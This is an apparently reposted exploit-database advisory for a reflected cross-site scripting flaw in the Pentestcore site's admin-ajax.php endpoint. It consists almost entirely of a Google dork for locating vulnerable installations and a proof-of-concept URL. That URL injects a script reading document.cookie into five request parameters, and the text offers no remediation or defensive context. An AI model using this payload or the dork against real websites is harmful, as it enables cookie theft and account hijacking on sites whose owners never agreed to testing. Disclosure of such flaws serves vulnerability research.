PENTESTCORE - Cross Site Scripting Vulnerability (XSS)
2020-10-02 22:38:36 Author: cxsecurity.com(查看原文) 阅读量:84 收藏

**************************** #Exploit Title: PENTESTCORE - Cross Site Scripting Vulnerability (XSS) #Date: 2020-10-01 #Exploit Author: Mahdi Karimi #Vendor Homepage: https://pentestcore.com #Google Dork: "Powered by Pentestcore" #Tested On: windows 10 Proof of Concept: Search google Dork: "Powered by Pentestcore" https://pentestcore.com/wp-admin/admin-ajax.php?action=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&post_id=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&nonce=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&is_comment=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&disabled=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E ************************************************** #Discovered by: Mahdi Karimi **************************************************


文章来源: https://cxsecurity.com/issue/WLB-2020100013
如有侵权请联系:admin#unsafe.sh